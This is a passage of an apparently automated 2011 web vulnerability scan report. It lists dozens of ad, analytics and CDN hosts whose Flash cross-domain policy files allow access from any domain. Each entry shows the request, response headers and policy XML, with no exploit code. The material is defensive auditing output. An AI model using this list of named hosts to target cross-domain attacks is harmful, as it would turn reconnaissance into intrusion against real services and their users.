Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 12:55:54 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.11. http://api.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Thu, 06 Oct 2011 12:49:45 GMT
X-FB-Server: 10.28.9.121
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

3.12. http://as.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 12:45:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.13. http://as1.suitesmart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as1.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e27-ca-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close
Cache-Control: no-store

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.14. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 12:45:57 GMT
Date: Tue, 06 Sep 2011 12:45:57 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.15. http://by.optimost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "784904063"
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Content-Length: 200
Server: Fast
Expires: Tue, 06 Sep 2011 11:58:57 GMT
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:58:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.16. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Tue, 06 Sep 2011 12:44:56 GMT
Date: Tue, 06 Sep 2011 12:44:56 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.17. http://cimage.adobe.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cimage.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cimage.adobe.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "5e218bdd5fdbe8b9035e9db6fa4ff6d0:1303309038"
Last-Modified: Wed, 20 Apr 2011 14:17:18 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:24:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.18. http://citizenstelecom.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://citizenstelecom.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: citizenstelecom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:44 GMT
Server: Omniture DC/2.0.0
xserver: www4
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.19. http://comcastresidentialservices.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: comcastresidentialservices.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:22:15 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

3.20. http://cr0.worthathousandwords.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cr0.worthathousandwords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cr0.worthathousandwords.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT
Accept-Ranges: bytes
ETag: "4a57df31d345c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 305
Cache-Control: max-age=3600
Date: Tue, 06 Sep 2011 12:49:50 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

3.21. http://d.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.yimg.com

Response

HTTP/1.0 200 OK
Date: Fri, 02 Sep 2011 12:24:58 GMT
Cache-Control: max-age=315360000
Expires: Mon, 30 Aug 2021 12:24:58 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 346877
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.22. http://e.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://e.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: e.yimg.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 05:38:35 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 05:38:35 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 25877
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.23. http://ec.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Age: 491413
Date: Tue, 06 Sep 2011 12:48:17 GMT
Expires: Wed, 07 Sep 2011 20:18:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.24. http://ehg-verizon.hitbox.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ehg-verizon.hitbox.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:54 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Tue, 06 Sep 2011 12:50:54 GMT
Content-Type: text/xml
Content-Length: 93

<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.25. http://event.adxpose.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1313179768000"
Last-Modified: Fri, 12 Aug 2011 20:09:28 GMT
Content-Type: application/xml
Content-Length: 203
Date: Tue, 06 Sep 2011 12:45:58 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

3.26. http://event.rtrk.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.rtrk.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:17 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Keep-Alive: timeout=12, max=70
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:10 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.27. http://external.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:45:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.28. http://g-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:25 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.29. http://iar.worthathousandwords.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://iar.worthathousandwords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: iar.worthathousandwords.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT
Accept-Ranges: bytes
ETag: "4a57df31d345c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:35:21 GMT
Connection: close
Content-Length: 305

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

3.30. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 12:46:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.31. http://img.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:55:56 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.32. http://int.teracent.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: int.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1310681767000"
Last-Modified: Thu, 14 Jul 2011 22:16:07 GMT
Content-Type: application/xml
Content-Length: 373
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.33. http://integrate.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://integrate.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Omniture DC/2.0.0
xserver: www56
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.34. http://l.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:08:15 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 12:08:15 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 1294
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.35. http://landing.optionshouse.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: landing.optionshouse.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 00:28:46 GMT
Accept-Ranges: bytes
ETag: "0734ba92a40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:15 GMT
Connection: close
Content-Length: 101

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.36. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:26 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.37. http://metrics.scottrade.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.scottrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.scottrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:47 GMT
Server: Omniture DC/2.0.0
xserver: www39
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.38. http://metrics.vonage.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:49 GMT
Server: Omniture DC/2.0.0
xserver: www10
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.39. http://pixel.everesttech.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "c68005-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=997452
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.40. http://pixel.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

3.41. http://pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.42. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

